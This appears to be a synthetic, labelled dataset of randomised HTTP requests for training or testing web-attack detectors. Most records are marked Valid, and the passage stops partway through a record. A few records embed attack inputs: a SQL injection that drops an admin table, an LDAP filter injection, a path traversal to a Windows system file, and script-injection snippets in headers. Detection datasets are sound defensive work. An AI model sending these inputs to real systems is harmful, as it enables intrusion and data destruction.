GET /p7cplFc694N/rp/huOxF1KF7dOj/jVAeZt1qg2bnbyu/eiwuyEsapneg1cen/iula5BpfM8-w_ukB/4swl9sanicQltgiarr/denirep5yTswHcyEAi/ig/08RwiXj@yPfiY.asmx?RkBQy78=f8ziets&ldoinaTwt0ateoT=%3F&ttN=6494&gqrt=1404&nerwttonwif1zf=7b9fnmt&Waw9QVFMWtG=tttarhL&hnO=elocationl2a6kkstdin&aGaeveinahs=7722&esav=iu8e8F%407&9n=lZtH HTTP/1.0
Host: 98.198.3.56
Connection: ieen
Accept: text/*, text/plain;q=0.5
Accept-Charset: gb2312, x-mac-chinesetrad;q=0.8, iso-10646-ucs-2, x-mac-chinesetrad;q=0.0
Accept-Encoding: gzip, compress
Accept-Language: U-okomiehe, o03Hina-hiuhcsm;q=0.1, eg-d1t81uas;q=0.1, em1DG-edTYiuo
Cache-Control: no-transform
Client-ip: 129.154.166.65
Cookie: 3wjhttpS@67=65
Cookie2: $Version="5"
Date: Sun, 15 Oct 06 11:15:22 CET
ETag: W/"TeGIEV_zNp-A5RYFH1"
Expect: 100-continue
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Sun, 18 Sep 05 22:45:33 UTC
If-None-Match: "xKH-WAALjNlvfIOToW"
If-Range: Mon, 19 May 08 10:17:04 GMT
Max-Forwards: 13
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic T3phSWlyczozeWU3
Range: 516737-,3-
Referer: /2nem.wmn
TE: trailers,trailers
User-Agent: &{[alert('Dsw');]};
UA-Pixels: 7335x113
Via: HTTP/3.6 www.boafn.shtml
Transfer-Encoding: identity
Upgrade: Ecza/9.5
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46628
Start - Id: 19197
class: Valid
GET /aeaeitzobqtexon/aYAWk3xppcCp5DdzIy.cfm?usa2cdsoit6i=655861&aepe3sa=07787&lneem8amc9rke=Lgfhec&ENconnect3copy4=7&r5an4ywq=92798&wshmrfyco=%5C%3Ecnio7tt&e3AkriHnontind=1hml&daSd=0868868239&etiZiftlineoof=fexecce&ch3oNoe1rEninhg=Lolmir1tteo0%7C%2Fmt&tw=jonoro4HhSdmh&e1IIscripts.M3VXu=weioi&Y.M5hZD=swl0eoesooovxtu6hr HTTP/1.0
Host: 169.177.133.11
Connection: At7aayc
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: p-a2a;q=0.5, hIhtArJ-cSu3o;q=0.1
Cache-Control: max-age=6
Client-ip: 194.46.12.62
Cookie: 5rc=x;ilws=0teg;azi=b9zopGMeYuI;takhOethkofwebI=7972330;oewwaRei=061;Pu=lseinT:mthtaccesy 
Cookie2: $Version="953"
Date: Sat, 29 Apr 06 03:02:40 CET
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Wed, 02 Apr 08 23:54:57 GMT
If-Unmodified-Since: Sun, 08 Jul 07 13:37:56 CET
If-Match: "iM9Hs-KmSqbjf0OP2d"
If-None-Match: "2moAAN-giP@lggKgkZM"
If-Range: "NRMcI.WBGMr@WMFo8oDy"
Max-Forwards: 144
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: 5disca arKvDE=rei2o
Authorization: NTLM ZG9zYWplZXM0cnVpaDh2YWhhYWRvd0V1cTllMmVuZjMzZWk=
Range: 967604-010774,-548402
Referer: /sooncrl/5mugwgJ.htm
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 1.9; aO-mg; rv:5.2.5) Gecko/07941595
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 6.1 118.102.198.56
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 189 59.44.75.168 "mazmEztho0mt0svdfi" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19197
Start - Id: 10809
class: Valid
GET /henyzj3GFHCGPBZWf9e/17mhaenf4taftsik/itiAMKs6hph5/hdh_lbdnKLxhoPv6MHSA/daD.shtml?soet7aoeE=lecapa HTTP/1.1
Host: www.neeMp.de
Connection: uteEb1tT
Accept: */*
Accept-Charset: shift_jis, x-mac-ce
Accept-Encoding: deflate;q=0.8, identity
Accept-Language: *
Cache-Control: max-age=77
Client-ip: 42.229.209.23
Cookie: oNpel4aviptwnni=tsd-td~q;ewocece=0;95Xcat=oD.s7vtTE;42rPl0gan=o
Cookie2: $Version="6"
Date: Thu, 11 Mar 04 24:26:40 UTC
ETag: W/"LqMv4X-b0yHrpmend0"
Expect: 100-continue
From: eatiedI@0aabliaA.fr
If-Modified-Since: Tue, 31 Aug 04 01:05:21 CET
If-Unmodified-Since: Sat, 05 Jan 08 11:20:15 GMT
If-Match: *
If-None-Match: "GiH.mpccJRqz_dMUYh"
If-Range: Sun, 07 Nov 04 24:21:30 UTC
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM dHI4ZXI4c0xpbWlxaXlrTkVlaWZwYXZiNWFkZDV5ZHJ0ZXkwaW5zbW9zbWV0bQ==
Range: -605203
Referer: /invaf5/h5IE.exe
TE: trailers,trailers
Trailer: Referer
User-Agent: siaey (izxeaGTB; axnnQb; dvyo0TFI4V; i5N6_a4@; duRhHcTpt)
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4636x443
Via: FTP/5.6 163.222.36.9, 2.5 209.39.81.105, atks1w/6.7 www.mMgf.htm
Transfer-Encoding: gzip
Upgrade: UCdsds/1.2, 90i8/4.1, shle/9.3, EcIlnn/9.9
Warning: 951 140.118.229.134 "esuyiiii5XtSsn4ie8" 
X-Forwarded-For: 87.0.224.171
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10809
Start - Id: 32882
class: Valid
PUT /lHLEVICBge0cuIEc/ElPnie2heeleoha/eA__xKMFgN.htm? HTTP/1.0
Content-Length: 57
Content-Language: enr,uur
Content-Encoding: gzip
Content-Location: /ndeie/sxi2/nnua.cfm
Content-MD5: ZXN0ZUx6a3J0d3Rzc0RlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jul 08 21:03:09 CET
Last-Modified: Sun, 07 Jan 07 18:26:58 CET
Host: 80.68.127.40
Connection: keep-alive
Accept: audio/*;q=0.5, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 12.98.135.178
Cookie: e3gaRu=ieew;iiNNehe1syten=754
Cookie2: $Version="0"
Date: Tue, 24 Apr 07 10:16:35 CET
ETag: W/"T7sqOVkzUqv42FeQ_P"
Expect: 100-continue
From: heae@rytmtosHp.biz
If-Modified-Since: Thu, 03 Jun 04 06:57:14 CET
If-Unmodified-Since: Sun, 15 Feb 04 08:20:59 UTC
If-Match: "wML_qTTCRKejqsgZ"
If-None-Match: "k7KwRFJiPytjtusMMvF"
If-Range: *
Max-Forwards: 1500
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b2lnbkFocnRJcDhuZWRlN0F0ZWNPZWlvZ3hZcmlzaUppdGg=
Authorization: Basic cGlxYXY6bWFzYXZF
Range: -11
Referer: /eeiewn/4iaiBd/lEcjH.css
TE: trailers,trailers,gzip
Trailer: Cache-Control
User-Agent: eOffreoe/3.5.6.5.2
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: 2.9 www.Etro.css:7006
Transfer-Encoding: tdrona; et5tat=rubee
Upgrade: 2eiteo/5.5, vaOkr/7.8, oUsl/6.5
Warning: 033 141.231.242.145 "t2po3soltutrrfuxesh" "Fri, 15 May 09 15:44:54 CET"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

A0tSQL=onea&taonesdTo=ctp&3PYsPta=rSst&scassxeuRyaaeT=974

End - Id: 32882
Start - Id: 39010
class: LdapInjection
POST /eMnah.7yIrK4wyEEN/HZ3Q/tatriuflucl/stdinnQFED61K_XR/tOLPDVUbOK/DuiecetaclsOurlsyect/Sanu/Drx9VMlocation0./qnBA5Pjkv1/ap/ajsedaebeeAwuobafEia/AN.cfm? HTTP/1.1
Content-Length: 31
Content-Language: iiawml,binoDF,5iwadof
Content-Encoding: identity
Content-Location: /dwoeact/yors/7qntiD/ersH4oh/5Nnds.wmn
Content-MD5: QWxoaXVUeWU5Y2VudHRwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 May 06 12:51:57 UTC
Last-Modified: Tue, 04 May 04 24:05:52 GMT
Host: www.cLyyudLa.com:77
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.8, ks_c_5601-1987, x-mac-roman
Accept-Encoding: gzip, gzip;q=0.3
Accept-Language: mStaeeo-cmmoo, kd-aoLmMr;q=0.8, wr18odE-eoo, zeL-nustyh;q=0.7, aa-etanide8
Cache-Control: min-fresh=77
Client-ip: 235.28.101.243
Cookie: pcSlbBrosd9i=aoIeRir4fhiiin;3hridnwr0r=5574
Cookie2: $Version="3"
Date: Sun, 28 Jan 07 08:14:13 UTC
ETag: W/"Pyd87k1Qm0CacE8"
Expect: 9OgnnhD
From: ze8cl@tfdIu.org
If-Modified-Since: Thu, 23 Aug 07 13:18:17 CET
If-Unmodified-Since: Sun, 21 Dec 08 24:23:44 CET
If-Match: "hFFt32UnjZ5MllxO.KQ"
If-None-Match: *
If-Range: *
Max-Forwards: 4132
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic YW5tc2U3OmJob3MzbA==
Authorization: Digest uri=http://www.uenziope.cz/dtsee.jpg
Referer: http://www.jyr3sOo.be/nbae.doc
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: ha)(  | (NsmS=*)
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: 4.5 www.9slhb.gif
Transfer-Encoding: gzip
Upgrade: li7sr/6.8, rawA/9.1, eoh3s/1.0, 7rs/2.6, nwr/4.9
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 137.88.250.0
X-Serial-Number: 168824

fese88bptpg=e &nXrmrNXeWcRlx=r 

End - Id: 39010
Start - Id: 3508
class: Valid
GET /Agcbd/dTYL4VXn2iOR/o2vcs3B/rcpPWqnzOP4bin6HI/emg.jpeg?zpassthru8XJu=l%28e&aesqtOc=5&elMyacals3tgs=p7tdch9_&PgyhHH=42004008&gi=20&deieEdltzcryoi=61&R_weval5vWgZ56=eery%5Cpt%25where+e&otae=tYymkt%40J&dan=01Tanwp HTTP/1.0
Host: www.eulie.cz
Connection: rad0
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 61.50.151.28
Cookie: ajneanj=[etct;sogR1licsei=n81;xdeb=50371343;soGhnsaRlw=7;ue0=labXMR
Cookie2: $Version="02"
Date: Thu, 04 Dec 08 18:17:33 UTC
ETag: ".8_hh5YZ3ai.FMsSeKw"
Expect: 100-continue
From: 4qmTaq3m@xens.uk
If-Modified-Since: Sun, 16 Sep 07 09:39:46 UTC
If-Unmodified-Since: Wed, 16 Apr 08 03:26:53 CET
If-Match: "9-piYqwHW@aATG_cp8z"
If-None-Match: *
If-Range: Sat, 18 Dec 04 08:28:42 GMT
Max-Forwards: 21
MIME-Version: 7.3
Pragma: dI=z9w
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: NTLM dHRudWVuMnNsaWRoczFadHhoaWFpYnRpcnJudXNSckFvbm5FY2xlZTJz
Range: -30400,-8
Referer: /3mnomc/siookh1e/obF4r/9bOhfmf/pxavfm.fgf
TE: trailers
Trailer: User-Agent
User-Agent: owGvFhk http://www.Ncids.st
UA-CPU: StrongARM
UA-Disp: 845,505,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3900x7810
Via: HTTP/1.8 www.ne4Net.png, 2.9 227.76.195.248
Transfer-Encoding: deflate
Upgrade: inat/2.9, rRci/3.1
Warning: 705 www.emid.html "2woor4" 
X-Forwarded-For: 36.213.69.49
X-Serial-Number: 8528165138107530
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 3508
Start - Id: 17938
class: Valid
GET /6w/qrrhtts3utsT42/c4q4d.php3? HTTP/1.1
Host: www.zdehe.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.0, gzip, gzip;q=0.5, compress;q=0.0
Accept-Language: j-Qah, a4niaa-evmea, ocn2-ltcez, 3N-roedb;q=0.9, c-n
Cache-Control: min-fresh=943
Client-ip: 136.196.112.139
Cookie: heAawlOovhtiz=zSI;7hincludeun5=rtbeioonmoedineed;E3UCl0LGQOQ=8049534
Cookie2: $Version="244"
Date: Thu, 07 Feb 08 07:35:38 GMT
ETag: "yclTXJwVcstjkSBH"
Expect: ehxeonbf
From: eua3@ehkkbs.cz
If-Modified-Since: Mon, 19 Oct 09 17:15:00 CET
If-Unmodified-Since: Wed, 13 May 09 08:48:14 CET
If-Match: "b6GJN8PZHKLKWYsH"
If-None-Match: *
If-Range: "t9kLuVabTd1S2IY3QN"
Max-Forwards: 9581
MIME-Version: 9.0
Pragma: epett5ae=ihIagtw
Proxy-Authorization: Digest nonce
Authorization: NTLM N2l0eWhleHJ0d2hzc0QxYjZ0Y2VsbWFmZTRIMGVlMDNkb25FaGVlVGVVZW9sZWVj
Range: 05-,-776516,-07
Referer: http://www.eeaz.de/axth/Oefyel7/ehtautF/b2mr/Cynht.jsp
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (compatible; Alaec; Win98; fusm)
UA-CPU: Sparc
UA-Disp: 5395,1752,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5744x7610
Via: FTP/1.5 www.oiodoeun.tiff
Transfer-Encoding: gzip
Upgrade: Paoi9/6.1, ret/0.0
Warning: 693 www.syfkpa.png "orntnwsqssReted3u" 
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17938
Start - Id: 720
class: Valid
GET /ctldD2_w43JJsFF_OEQ/yLvKs0r1bcW/7ZNuyCLYlj/tCmJ.@2AwPDJ/hiromsaeb0rbshnhad/keGNpba0F6.2P/D3o.sh?_6Eme=7055&wimgk7rL.=c&aunshnmew=utSwindow.open%28t%3Be8ahl3kcsmd&OqnRrPc1MservicesYi=37396&RK.RZVi8B=pnEsldno9nve&WXjordkUqRU=798&eb=E&sofsEcH2wleC8n=3705&ejsfepni=717141 HTTP/1.0
Host: 173.182.117.130
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 58.235.63.224
Cookie: tU11=cq 8sgbtke8dj w=onn;oD.S9O=hboot.ini40;sa9noat8dlotcof=cathl;sotCtti7Sa=tiot
Cookie2: $Version="930"
Date: Sun, 14 Oct 07 16:22:31 CET
ETag: W/"3R1QzRCMLW2qhvW"
Expect: 100-continue
From: soeaef8E@trdpelmitT.st
If-Modified-Since: Sun, 06 Aug 06 15:39:23 UTC
If-Unmodified-Since: Sat, 28 Nov 09 10:42:25 CET
If-Match: "RT34PXwLjN4sawt6RR-"
If-None-Match: *
If-Range: Fri, 12 Dec 08 04:31:49 UTC
Max-Forwards: 2440
MIME-Version: 8.8
Pragma: itntnr='gwc'
Proxy-Authorization: riett grerxIas=LSauaaO
Authorization: Digest qop=auth
Range: -523,85-12956,5-
Referer: http://www.sits.uk/eRjuomi/sent/aeIeo/stpheh.txt
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: 2D8Nox_ http://www.ekkdsonE.net
UA-CPU: Sparc
UA-Disp: 573,0887,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 180x0493
Via: FTP/6.3 www.eenla.html
Transfer-Encoding: gzip
Upgrade: 9amai/2.9, ltd/1.9, TsDetE/7.2, bl0wa1/1.8
Warning: 247 www.6atoou9u.css:82615 "7ySec6LYstptsi" 
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 720
Start - Id: 5813
class: Valid
POST /tl0oeoi/3mWyL/agaqarnC1/fBulimr89FL/reghnhossQnza/qSV6J_3PS/wrTtxmpiutIl/hVUS/iVsIaXc0/laUnhenAeatYtpsac/kLP.CW4LPvqR.swf? HTTP/1.1
Content-Length: 215
Content-Language: erhrtkt,dis
Content-Encoding: identity
Content-Location: http://vaho.fr/unnse/ndgiDzh/Tettbb.cfm
Content-MD5: YXVuYW5pbm00bXNwb3NhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Sep 06 21:00:18 GMT
Last-Modified: Fri, 07 May 04 12:57:40 GMT
Host: 170.170.81.116
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.2, x-mac-cyrillic
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=961
Client-ip: 30.0.47.86
Cookie: Ol=nbaypiihT;gmwsiArueie=6145390;FtsvfmetavEi=ecNeg;nprocessing-instructionz@z=d8Rd;nnmau=okthalolog|cd6)e=
Cookie2: $Version="558"
Date: Fri, 25 Jun 04 05:23:02 UTC
ETag: "PtKseiqlAztH7Rsq"
Expect: 100-continue
From: s8eohuh@Trune.de
If-Modified-Since: Mon, 09 Aug 04 09:00:36 CET
If-Unmodified-Since: Sat, 02 Feb 08 04:20:31 CET
If-Match: *
If-None-Match: "Avd3ca2K9TS9FeGXu0U"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 9302
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic bXRhbjVwOjloa2hxSA==
Authorization: Basic dDE5b2F5Om93NGk=
Range: 741779-46
Referer: /eM6s/fasitce.css
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: selz2homrtKsEawe
UA-CPU: PowerPC
UA-Disp: 3134,886,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1021x7299
Via: 2.5 www.eE3dc.html, HTTP/2.4 102.78.132.245
Transfer-Encoding: gzip
Upgrade: eofot/7.1, enp86s/1.0, Rsdxsg/5.0, ltt/5.1
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

neer=l2Gtpjn_G.a&vfmc=2268&oothEo5oo6girna=anhtmw&9eiErhre=swammztmoarhsc5ni&sprhottsrae=d~iframeooopasswdh&snyd=674088460&3ooejnp=ie ahsid i306)aaeej&gno7yors=ihnoed+e&4ns2di3=120216832&seoglr2Mclr8=iUl69wF.c

End - Id: 5813
Start - Id: 45843
class: PathTransversal
GET /fv/krbdtTse7sddyo/hnhhei/ne2azo/bd1tweb0shhe/eXod2u/itB3Et0chedtn/ok-9J3nFlP5vokfZZ/m@ZjnhcWNVSAPfYcUHtD.jpeg?5Ctraeiefz=e7%3A%24&Avlsntsbs9H=0%7Co&feld9mct=86660&duLr4ohtamOenr=7590085&NnrEajhede=smqN5yhbqtA&JL7W=89797667&n8r8rcn=0&dsiL=%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: 187.102.252.188:54946
Connection: keep-alive
Accept: image/*, application/x-tar;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: aSt3TduT-tye1;q=0.1, wae-ntaDrema, zershai-oizm, leern-regR, eeo-d5ihi
Cache-Control: max-age=1
Client-ip: 145.76.47.201
Cookie: @rcpc8netcatTLPBIZ=s7GQGjc;hatis=gleSe0iB4g;t3i=psod|a
Cookie2: $Version="59"
Date: Mon, 25 Dec 06 13:21:03 UTC
ETag: "Bs@iWZ-x61XxQ2FMlF"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 21 Aug 06 12:44:36 GMT
If-Unmodified-Since: Thu, 27 Jul 06 01:27:02 CET
If-Match: *
If-None-Match: *
If-Range: "qm0GBgPO@uXL2ov"
Max-Forwards: 3350
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest realm
Range: 248-
Referer: http://Ttnm.de/naXeFod/sSara/TuTf/iOgoo.php3
TE: trailers,deflate;q=0.7,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 5.9; is-su; rv:2.4.7) Gecko/76059966
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 271x8605
Via: FTP/7.6 www.eiohilm.jpeg, FTP/5.3 147.230.170.29
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45843
Start - Id: 3045
class: Valid
GET /3b3bRuZMVn.5rTFPva/8ZPhn9GYGxc4WOR/oamayoontfisaO9ifb/febH4TYQHWq9h0/o.Hio3eoakp.@A8b2Vx/t3/adCW8mBFGHVcp2fYL/sa/dhjL/access_logZNdWupdatedG/Xmm.RLCKwixrcpMJ9/ykoD0.u-Zr.msf?tcchdThcpotmYe5=6020169&euth9laUmo=896591342&annrr9=czler&TyieE=9 HTTP/1.0
Host: www.Pnrtr.com
Connection: close
Accept: video/*;q=0.7, text/*;q=0.4
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: h-8ensre, rtdogcns-vr;q=0.3, eoa-tn;q=0.3, ohc-oo;q=0.8
Cache-Control: max-age=4
Client-ip: 204.161.177.41
Cookie: 9ctpr=oonq80gstctso0bao9
Cookie2: $Version="0"
Date: Fri, 08 Jun 07 08:40:55 GMT
ETag: "EzuQe-OrDGSEFMd2f"
Expect: WegmR
From: clms@lki1al.be
If-Modified-Since: Sun, 29 Apr 07 08:43:00 CET
If-Unmodified-Since: Tue, 20 Apr 10 22:29:04 CET
If-Match: "6PPZjRkB3MFascEzYz@m"
If-None-Match: *
If-Range: Fri, 07 Mar 08 06:31:01 GMT
Max-Forwards: 591
MIME-Version: 6.8
Pragma: e9=m0aMe
Proxy-Authorization: em1h oanPog=nsx8qtr5
Authorization: Digest uri=/bhiu/a9Yofd/gnrehi/Mlnott.exe
Range: 92-,7389-091,-078
Referer: http://www.aegamm.fr/ilie/dmysyr/osGn/7smn/ic0te.swf
TE: trailers,trailers
Trailer: Trailer
User-Agent: amfakcPiaa (eDdRojex; iA_MEyf-; nkvkhPQn; dx_oppFE)
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 090x4434
Via: cuoiT/1.1 www.fweeEo.js:60741
Transfer-Encoding: dayy; t81d=diutior
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 679 www.uhimetrd.html "cgr2qzlheraeelo" 
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 2317803874
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3045
Start - Id: 41519
class: SqlInjection
PUT /w4_.nsf? HTTP/1.1
Content-Length: 117
Content-Language: Ms,6e,o
Content-Encoding: deflate
Content-Location: /ikmNlou/nudreN.cfm
Content-MD5: aGVoc2lDMGx5cXRlaWFPZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.mgAtsta.net:80
Connection: close
Accept: image/*;q=0.0
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: f-aqii
Cache-Control: max-age=207
Client-ip: 78.241.99.85
Cookie: zoel=mlUk7jiNIu;ehs=wen9flthtr)ra
Cookie2: $Version="16"
Date: Fri, 11 May 07 04:07:01 GMT
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sat, 25 Apr 09 21:17:02 GMT
If-Unmodified-Since: Mon, 28 Jan 08 03:49:15 GMT
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: *
Max-Forwards: 3535
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: war8dc vont=sei1
Range: -68
Referer: http://eSrb.de/j1eta/wuig.asmx
TE: trailers,gzip;q=0.7,deflate;q=0.2
Trailer: User-Agent
User-Agent: we8n9T8m/7.2.6.5.0
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6912x601
Via: 3.2 www.fld4mu7.jpg, 8.9 www.3uOaie.jpeg, 1.0 87.47.0.33:2
Transfer-Encoding: iebnb
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

woEVGautoexecc=';  drop     table  admin&erlhabtohntlal=52&T8k=e|ssaa&renn=i]rcu&Ttn6=561809&IirX09ica=392978

End - Id: 41519
Start - Id: 2151
class: Valid
GET /wl.js?rudi9hsojpe=deeenivwtcDore&wgpxAani=steeAste%3E1%5Cdy%40nst&tikhf7lvaoau=43&hn1ohjasthe=61470&nooara5pxkun=ivX9xG9wfE&operine=%5DTE&nasmpieneoha=9ZRJqtc7Vqy&c1rttmy=0863867&mhfhe=89&1Hrw=oehkmshl7t0&teqjetcsre=8341&ospeeppfaej=h7&8RcteOxibdcO=146&ZdbmtSbLeMesn=Cvstrir HTTP/1.1
Host: www.1pertneq.be
Connection: n2usio2r
Accept: */*;q=0.9
Accept-Charset: gb2312, iso-8859-2
Accept-Encoding: compress;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 94.217.190.139
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Thu, 03 Jul 08 11:58:06 GMT
ETag: W/"ZLHDnIKtYggZB4ECjVNb"
Expect: 100-continue
From: cwaupt@0tmyctatse.net
If-Modified-Since: Fri, 13 Oct 06 06:31:59 UTC
If-Unmodified-Since: Sat, 09 Jul 05 10:51:40 CET
If-Match: "1c9ptX2A0MCbnFj"
If-None-Match: "Ma_J4I2u0pl1@p9ogP55"
If-Range: "@QWvswOR2h5r5kg"
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aGQ1UGVzOnByYTho
Range: -355382,8-,197-881019
Referer: /sshea/sctypss/jeiat/wauoeo/eRllo.js
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 5.0; eo-sE; rv:4.9.7) Gecko/11381869
UA-CPU: MIPS
UA-Disp: 926,2372,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 114x854
Via: 1.0 www.te8vd.html, 3.5 26.68.128.116
Transfer-Encoding: deflate
Upgrade: lsrylr/1.6, 3iueu/0.5, omee/0.5
Warning: 918 www.el1rbcw.jpg "atie2" "Thu, 08 Mar 07 15:19:23 UTC"
X-Forwarded-For: 186.3.114.97
X-Serial-Number: 9895241717803854226
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2151
Start - Id: 12717
class: Valid
GET /oWNZ.swf? HTTP/1.1
Host: 42.53.66.68:80
Connection: close
Accept: text/plain;q=0.2, text/plain
Accept-Charset: iso-8859-4;q=0.1, utf-8;q=0.4, cp-936, windows-1250, x-mac-greek;q=0.0
Accept-Encoding: 
Accept-Language: alyk-nrhnl, rthLl-vtg0eeft;q=0.6, ihodwk-ua, tdqbw-lcienen, atou-Rbic7s
Cache-Control: no-transform
Client-ip: 198.18.145.34
Cookie: OoaqcplEl4n=wnpluo;pIviet6sh=8o;2V@BwHs3telnet5mnph-=645;aUenmnp=Ohl
Cookie2: $Version="01"
Date: Thu, 24 Jun 04 17:11:15 GMT
ETag: W/"d9S.r3fKIS6Fljpo18Q"
Expect: 100-continue
From: snHyan@Ot1omtao.gov
If-Modified-Since: Thu, 19 May 05 04:33:43 UTC
If-Unmodified-Since: Thu, 25 Nov 04 11:33:24 CET
If-Match: "F4Lsa8L0KvHF0j8Eo"
